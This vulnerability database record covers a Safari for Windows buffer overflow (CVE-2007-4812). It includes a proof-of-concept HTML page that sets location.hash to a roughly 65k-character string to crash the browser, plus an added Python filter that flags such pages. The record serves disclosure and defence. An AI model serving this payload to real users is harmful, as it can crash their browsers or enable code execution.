Apple Safari for Windows Document.Location.Hash Buffer Overflow Vulnerability

Vulnerability ID: 1113185
Vulnerability type: Buffer overflow
Published: 2007-06-25
Updated: 2007-11-15
CVE: CVE-2007-4812
CNNVD ID: CNNVD-200709-108
Platform: Windows
CVSS score: 5.0
|Sources
https://www.exploit-db.com/exploits/30767
https://www.securityfocus.com/bid/26448
https://cxsecurity.com/issue/WLB-2007090028
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200709-108
|Details
Apple Safari 3.0.3 (522.15.5) and other versions before Beta Update 3.0.4 contain a buffer overflow vulnerability. A remote attacker can cause a denial of service (crash) and possibly have other unspecified impact by setting document.location.hash to an overly long string.
|Exploit (EXP)
source: http://www.securityfocus.com/bid/26448/info

Safari for Windows is prone to a buffer overflow that occurs when an attacker entices a victim to view a maliciously crafted webpage.

A remote attacker may exploit this issue to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. 

<html>
<body>
<script>
var maxbuf = 65474;
buff = "A";
for (i = 0; i < maxbuf; i++) { buff = buff + "A"; }
document.location.hash = buff + "BOW! ";
alert(document.location.hash);
</script>
</body>
</html>
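The proof of concept above builds a fragment identifier of roughly 65k characters in a loop and assigns it to document.location.hash. A content-inspection gateway or web-proxy filter can flag that pattern statically before the page reaches a vulnerable client. The following script is an added example for this record, not code from the original page or from Apple: it extracts inline scripts, looks for assignments to location.hash, and estimates the longest string the script could construct (literal length, .repeat() count, or the bound of a for-loop whose limit is a numeric variable). The threshold MAX_REASONABLE_HASH and all sample pages are constructed assumptions.

```python
import re
from typing import Dict

# Assumed threshold: no legitimate fragment identifier approaches this length;
# the PoC for this record builds one of roughly 65k characters.
MAX_REASONABLE_HASH = 4096

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
# assignment to location.hash (document./window. prefixed or bare); excludes '=='
HASH_ASSIGN_RE = re.compile(r"\blocation\.hash\s*=(?!=)")
# for (i=0; i<N; i++) style loops; N may be a numeric literal or a variable name
LOOP_RE = re.compile(r"for\s*\(\s*\w+\s*=\s*\d+\s*;\s*\w+\s*<\s*(\w+)\s*;")
NUM_ASSIGN_RE = re.compile(r"\b(\w+)\s*=\s*(\d+)\b")
REPEAT_RE = re.compile(r"\.repeat\(\s*(\d+)\s*\)")
STRING_RE = re.compile(r"\"(?:[^\"\\]|\\.)*\"|'(?:[^'\\]|\\.)*'")


def _numeric_bindings(js: str) -> Dict[str, int]:
    """Collect simple `name = 123` bindings so loop bounds can be resolved."""
    return {m.group(1): int(m.group(2)) for m in NUM_ASSIGN_RE.finditer(js)}


def estimate_max_string_length(js: str) -> int:
    """Upper-bound guess of the longest string a script fragment could build."""
    bindings = _numeric_bindings(js)
    longest = 0
    for m in STRING_RE.finditer(js):
        longest = max(longest, len(m.group(0)) - 2)  # drop the two quote chars
    for m in REPEAT_RE.finditer(js):
        longest = max(longest, int(m.group(1)))
    for m in LOOP_RE.finditer(js):
        bound = m.group(1)
        n = int(bound) if bound.isdigit() else bindings.get(bound, 0)
        longest = max(longest, n)
    return longest


def inspect_page(html: str) -> Dict[str, object]:
    """Flag pages whose inline scripts assign location.hash from a huge string."""
    scripts = SCRIPT_RE.findall(html)
    assigns_hash = any(HASH_ASSIGN_RE.search(s) for s in scripts)
    estimate = max((estimate_max_string_length(s) for s in scripts), default=0)
    return {
        "assigns_hash": assigns_hash,
        "estimated_length": estimate,
        "suspicious": assigns_hash and estimate > MAX_REASONABLE_HASH,
    }


# Constructed sample pages (not taken from any real site): the loop pattern of
# the PoC, a benign in-page anchor jump, and a String.prototype.repeat variant.
SAMPLES = {
    "poc_loop": (
        '<html><body><script>var maxbuf = 65474; buff = "A"; '
        'for (i=0;i<maxbuf;i++) { buff = buff+"A"; } '
        'document.location.hash = buff+"BOW! ";</script></body></html>'
    ),
    "benign": '<html><body><script>location.hash = "#section2";</script></body></html>',
    "repeat": '<html><body><script>window.location.hash = "A".repeat(70000);</script></body></html>',
}

if __name__ == "__main__":
    for name, page in SAMPLES.items():
        print(name, inspect_page(page))
```

The estimate is deliberately an upper bound: it treats every loop bound or repeat count as a possible string length, so a page that loops 70,000 times over something unrelated to the fragment will also be flagged. For a gateway filter that is the right trade-off, since a false positive costs one review while a miss delivers the crash to the client.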
|Affected products
Apple Safari 3.0.3 Beta for Windows
Apple Safari 3.0.2 Beta for Windows
Apple Safari 3.0.1 Beta for Windows
Apple Safari 3 Beta for Windows
|References

Source: BID
Name: 26448
Link: http://www.securityfocus.com/bid/26448
Source: BUGTRAQ
Name: 20070907 Safari 3.0.3 (522.15.5) Buffer overflow
Link: http://www.securityfocus.com/archive/1/archive/1/478802/100/0/threaded
Source: SREASON
Name: 3111
Link: http://securityreason.com/securityalert/3111
Source: OSVDB
Name: 43971
Link: http://osvdb.org/43971
Source: APPLE
Name: APPLE-SA-2007-11-14
Link: http://lists.apple.com/archives/Security-announce/2007/Nov/msg00003.html